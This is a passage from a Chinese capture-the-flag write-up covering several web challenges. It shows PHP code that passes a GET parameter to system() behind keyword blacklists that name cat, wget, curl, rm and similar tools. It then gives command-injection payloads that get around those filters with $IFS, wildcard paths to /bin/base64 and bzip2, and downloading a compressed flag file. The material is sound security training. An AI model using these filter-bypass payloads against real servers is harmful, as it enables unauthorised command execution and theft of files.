class="lit">5</span><span class="pun">)</span><span class="pln">tail</span><span class="pun">:查看尾几行</span></code></li><li class="L6"><code><span class="pun">(</span><span class="lit">6</span><span class="pun">)</span><span class="pln">nl</span><span class="pun">：显示的时候，顺便输出行号</span></code></li><li class="L7"><code><span class="pun">(</span><span class="lit">7</span><span class="pun">)</span><span class="pln">od</span><span class="pun">:以二进制的方式读取档案内容</span></code></li><li class="L8"><code><span class="pun">(</span><span class="lit">8</span><span class="pun">)</span><span class="pln">vi</span><span class="pun">:一种编辑器，这个也可以查看</span></code></li><li class="L9"><code><span class="pun">(</span><span class="lit">9</span><span class="pun">)</span><span class="pln">vim</span><span class="pun">:一种编辑器，这个也可以查看</span></code></li><li class="L0"><code><span class="pun">(</span><span class="lit">10</span><span class="pun">)</span><span class="pln">sort</span><span class="pun">:可以查看,将文件进行排序并输出</span></code></li><li class="L1"><code><span class="pun">(</span><span class="lit">11</span><span class="pun">)</span><span class="pln">uniq</span><span class="pun">:可以查看，报告或忽略文件中的重复行</span></code></li><li class="L2"><code><span class="pun">(</span><span class="lit">12</span><span class="pun">)</span><span class="pln">file </span><span class="pun">-</span><span class="pln">f</span><span class="pun">:报错出具体内容</span></code></li><li class="L3"><code><span class="pln">grep grep test </span><span class="pun">*</span><span class="pln">file   </span><span class="com">#在当前目录中，查找后缀有 file 字样的文件中包含 test 字符串的文件，并打印出该字符串的行</span></code></li></ol></pre><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">:</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">nl$IFS\fla</span><span class="pun">?.</span><span class="pln">php</span><span class="pun">||</span></code></li><li class="L2"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">nl$IFS\fla\g</span><span class="pun">.</span><span class="pln">php</span><span class="pun">||</span></code></li></ol></pre><h2 id="h2-ctf-80"><a name="CTF-80" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-80</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">  </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">])){</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    $c</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">];</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|`|%|x09|x26|&gt;|&lt;/i"</span><span class="pun">,</span><span class="pln"> $c</span><span class="pun">)){</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        system</span><span class="pun">(</span><span class="pln">$c</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">适用条件:过滤了</span><span class="pln">cat</span></code></li><li class="L1"><code><span class="lit">1</span><span class="pun">)</span><span class="pln">more</span><span class="pun">:一页一页的显示档案内容</span></code></li><li class="L2"><code><span class="pun">(</span><span class="lit">2</span><span class="pun">)</span><span class="pln">less</span><span class="pun">:与</span><span class="pln"> more </span><span class="pun">类似，但是比</span><span class="pln"> more </span><span class="pun">更好的是，他可以[</span><span class="pln">pg dn</span><span class="pun">][</span><span class="pln">pg up</span><span class="pun">]翻页</span></code></li><li class="L3"><code><span class="pun">(</span><span class="lit">3</span><span class="pun">)</span><span class="pln">head</span><span class="pun">:查看头几行</span></code></li><li class="L4"><code><span class="pun">(</span><span class="lit">4</span><span class="pun">)</span><span class="pln">tac</span><span class="pun">:从最后一行开始显示，可以看出</span><span class="pln"> tac </span><span class="pun">是</span><span class="pln"> cat </span><span class="pun">的反向显示</span></code></li><li class="L5"><code><span class="pun">(</span><span class="lit">5</span><span class="pun">)</span><span class="pln">tail</span><span class="pun">:查看尾几行</span></code></li><li class="L6"><code><span class="pun">(</span><span class="lit">6</span><span class="pun">)</span><span class="pln">nl</span><span class="pun">：显示的时候，顺便输出行号</span></code></li><li class="L7"><code><span class="pun">(</span><span class="lit">7</span><span class="pun">)</span><span class="pln">od</span><span class="pun">:以二进制的方式读取档案内容</span></code></li><li class="L8"><code><span class="pun">(</span><span class="lit">8</span><span class="pun">)</span><span class="pln">vi</span><span class="pun">:一种编辑器，这个也可以查看</span></code></li><li class="L9"><code><span class="pun">(</span><span class="lit">9</span><span class="pun">)</span><span class="pln">vim</span><span class="pun">:一种编辑器，这个也可以查看</span></code></li><li class="L0"><code><span class="pun">(</span><span class="lit">10</span><span class="pun">)</span><span class="pln">sort</span><span class="pun">:可以查看,将文件进行排序并输出</span></code></li><li class="L1"><code><span class="pun">(</span><span class="lit">11</span><span class="pun">)</span><span class="pln">uniq</span><span class="pun">:可以查看，报告或忽略文件中的重复行</span></code></li><li class="L2"><code><span class="pun">(</span><span class="lit">12</span><span class="pun">)</span><span class="pln">file </span><span class="pun">-</span><span class="pln">f</span><span class="pun">:报错出具体内容</span></code></li><li class="L3"><code><span class="pln">grep grep test </span><span class="pun">*</span><span class="pln">file   </span><span class="com">#在当前目录中，查找后缀有 file 字样的文件中包含 test 字符串的文件，并打印出该字符串的行</span></code></li></ol></pre><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">:</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">vi$IFS</span><span class="pun">????????</span></code></li><li class="L2"><code><span class="pun">这个有效</span><span class="pln"> </span><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">uniq$IFS</span><span class="pun">????????</span></code></li><li class="L3"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="str">/bin/</span><span class="pln">c</span><span class="pun">??</span><span class="pln">$IFS</span><span class="pun">????????</span></code></li></ol></pre><h2 id="h2-ctf-81"><a name="CTF-81" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-81</h2><p><strong>flag是存在一张二维码中<br>这张图片是被另一张图片盖住了扫不到<br>但是查看源码可得知图片名</strong></p>
<p><strong>直接访问</strong><br>/flag.png<br><strong>查看到图片后扫描二维码获取到flag</strong></p>
<p>flag: THIS_FLAG_PNG_XXX</p>
<h2 id="h2-ctf-82"><a name="CTF-82" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-82</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php </span></code></li><li class="L1"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">])){</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    $c</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">];</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/;|[a-z]|`|%|x09|x26|&gt;|&lt;/i"</span><span class="pun">,</span><span class="pln"> $c</span><span class="pun">)){</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        system</span><span class="pun">(</span><span class="pln">$c</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li></ol></pre>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">/</span><span class="pln">bin</span><span class="pun">目录</span></code></li><li class="L1"><code><span class="pln">bin</span><span class="pun">为</span><span class="pln">binary</span><span class="pun">的简写主要放置一些</span><span class="pln"> </span><span class="pun">系统的必备执行档</span></code></li><li class="L2"><code><span class="pun">例如:</span><span class="pln">cat</span><span class="pun">、</span><span class="pln">cp</span><span class="pun">、</span><span class="pln">chmod df</span><span class="pun">、</span><span class="pln">dmesg</span><span class="pun">、</span><span class="pln">gzip</span><span class="pun">、</span><span class="pln">kill</span><span class="pun">、</span><span class="pln">ls</span><span class="pun">、</span><span class="pln">mkdir</span><span class="pun">、</span><span class="pln">more</span><span class="pun">、</span><span class="pln">mount</span><span class="pun">、</span><span class="pln">rm</span><span class="pun">、</span><span class="pln">su</span><span class="pun">、</span><span class="pln">tar</span><span class="pun">、</span><span class="pln">base64</span><span class="pun">等</span></code></li></ol></pre><p><strong>这里我们可以利用 base64 中的64 进行通配符匹配 即 /bin/base64 flag.php</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">：</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="str">/???/</span><span class="pun">????</span><span class="lit">64</span><span class="pln"> </span><span class="pun">????.???</span></code></li></ol></pre><p><strong>也就是</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="str">/bin/</span><span class="pln">base64 flag</span><span class="pun">.</span><span class="pln">php</span></code></li><li class="L1"><code><span class="pun">/</span><span class="pln">usr</span><span class="pun">/</span><span class="pln">bin</span><span class="pun">目录</span></code></li></ol></pre><p><strong>主要放置一些应用软件工具的必备执行档</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">例如</span><span class="pln">c</span><span class="pun">++、</span><span class="pln">g</span><span class="pun">++、</span><span class="pln">gcc</span><span class="pun">、</span><span class="pln">chdrv</span><span class="pun">、</span><span class="pln">diff</span><span class="pun">、</span><span class="pln">dig</span><span class="pun">、</span><span class="pln">du</span><span class="pun">、</span><span class="pln">eject</span><span class="pun">、</span><span class="pln">elm</span><span class="pun">、</span><span class="pln">free</span><span class="pun">、</span><span class="pln">gnome</span><span class="pun">*、</span><span class="pln"> zip</span><span class="pun">、</span><span class="pln">htpasswd</span><span class="pun">、</span><span class="pln">kfm</span><span class="pun">、</span></code></li><li class="L1"><code><span class="pln">ktop</span><span class="pun">、</span><span class="kwd">last</span><span class="pun">、</span><span class="pln">less</span><span class="pun">、</span><span class="pln">locale</span><span class="pun">、</span><span class="pln">m4</span><span class="pun">、</span><span class="pln">make</span><span class="pun">、</span><span class="pln">man</span><span class="pun">、</span><span class="pln">mcopy</span><span class="pun">、</span><span class="pln">ncftp</span><span class="pun">、</span><span class="pln"> newaliases</span><span class="pun">、</span><span class="pln">nslookup passwd</span><span class="pun">、</span><span class="pln">quota</span><span class="pun">、</span><span class="pln">smb</span><span class="pun">*、</span><span class="pln">wget</span><span class="pun">等。</span></code></li></ol></pre><p><strong>我们可以利用/usr/bin下的bzip2</strong></p>
<p><strong>意思就是说我们先将flag.php文件进行压缩，然后再将其下载</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">paylaod</span><span class="pun">：</span></code></li><li class="L1"><code><span class="pun">先?</span><span class="pln">c</span><span class="pun">=</span><span class="str">/???/</span><span class="pun">???/????</span><span class="lit">2</span><span class="pln"> </span><span class="pun">????.???</span></code></li><li class="L2"><code></code></li><li class="L3"><code><span class="pun">然后在</span><span class="pln">url</span><span class="pun">后面加上/</span><span class="pln">flag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">.</span><span class="pln">bz2 </span><span class="pun">下载文件</span></code></li><li class="L4"><code></code></li><li class="L5"><code><span class="pln">http</span><span class="pun">:</span><span class="com">//xxxxxxxxxxxxxxxxxx/flag.php.bz2</span></code></li></ol></pre></div>